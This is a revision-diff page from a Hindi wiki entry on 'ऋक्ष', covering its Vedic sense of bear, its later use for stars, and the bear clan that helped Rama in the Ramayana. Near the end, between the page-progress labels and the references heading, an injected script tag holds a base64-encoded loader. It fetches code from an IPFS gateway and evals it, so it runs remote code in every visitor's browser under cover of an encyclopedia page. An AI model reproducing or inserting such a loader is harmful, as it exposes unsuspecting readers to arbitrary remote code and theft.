Difference between revisions of "ऋक्ष"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:पुराण (को हटा दिया गया हैं।))
 
(2 intermediate revisions by one other user not shown)
Line 1: Line 1:
 +
{{बहुविकल्प|बहुविकल्पी शब्द=ऋक्ष |लेख का नाम=ऋक्ष (बहुविकल्पी)}}
 +
 
*ऋक्ष का अर्थ होता है- रीछ या भालू।
 
*ऋक्ष का अर्थ होता है- रीछ या भालू।
*[[ऋग्वेद]] में ऋक्ष शब्द एक बार तथा परवर्ती वैदिक [[साहित्य]] में कदाचित ही प्रयुक्त हुआ है।  
+
*[[ऋग्वेद]] में ऋक्ष शब्द एक बार तथा परवर्ती [[वैदिक साहित्य]] में कदाचित ही प्रयुक्त हुआ है।  
 
*स्पष्टत: यह जंतु वैदिक [[भारत]] में बहुत कम पाया जाता था, इस शब्द का बहुवचन में प्रयोग 'सप्तऋषियों' के अर्थ में भी कम ही हुआ है।  
 
*स्पष्टत: यह जंतु वैदिक [[भारत]] में बहुत कम पाया जाता था, इस शब्द का बहुवचन में प्रयोग 'सप्तऋषियों' के अर्थ में भी कम ही हुआ है।  
*ऋग्वेद में दानस्तुति के एक मंत्र में 'ऋक्ष' एक संरक्षक का नाम है, जिसके पुत्र आर्क्ष का उल्लेख दूसरे मंत्र में आया है।  
+
*ऋग्वेद में दानस्तुति के एक मंत्र में 'ऋक्ष' एक संरक्षक का नाम है, जिसके पुत्र 'आर्क्ष' का उल्लेख दूसरे मंत्र में आया है।  
 
*परवर्ती काल में [[नक्षत्र|नक्षत्रों]] के अर्थ में इसका प्रयोग हुआ है।  
 
*परवर्ती काल में [[नक्षत्र|नक्षत्रों]] के अर्थ में इसका प्रयोग हुआ है।  
*[[रामायण]] तथा [[पुराण|पुराणों]] की कई गाथाओं में ऋक्ष एक जाति विशेष का नाम है।  
+
*[[रामायण]] तथा [[पुराण|पुराणों]] की कई गाथाओं में 'ऋक्ष, एक जाति विशेष' का नाम है।  
 
*ऋक्षों ने [[रावण]] से युद्ध करने में [[राम]] की सहायता की थी।  
 
*ऋक्षों ने [[रावण]] से युद्ध करने में [[राम]] की सहायता की थी।  
  
Line 18: Line 20:
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
__INDEX__
+
==सम्बंधित लेख==
 
+
{{रामायण}}
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]
 
[[Category:रामायण]]
 
[[Category:रामायण]]
 
[[Category:पुराण]]
 
[[Category:पुराण]]
 +
__INDEX__

Latest revision as of 07:39, 14 April 2016

chitr:Disamb2.jpg rriksh ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- rriksh (bahuvikalpi)
  • rriksh ka arth hota hai- richh ya bhaloo.
  • rrigved mean rriksh shabd ek bar tatha paravarti vaidik sahity mean kadachit hi prayukt hua hai.
  • spashtat: yah jantu vaidik bharat mean bahut kam paya jata tha, is shabd ka bahuvachan mean prayog 'saptrrishiyoan' ke arth mean bhi kam hi hua hai.
  • rrigved mean danastuti ke ek mantr mean 'rriksh' ek sanrakshak ka nam hai, jisake putr 'arksh' ka ullekh doosare mantr mean aya hai.
  • paravarti kal mean nakshatroan ke arth mean isaka prayog hua hai.
  • ramayan tatha puranoan ki kee gathaoan mean 'rriksh, ek jati vishesh' ka nam hai.
  • rrikshoan ne ravan se yuddh karane mean ram ki sahayata ki thi.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sambandhit lekh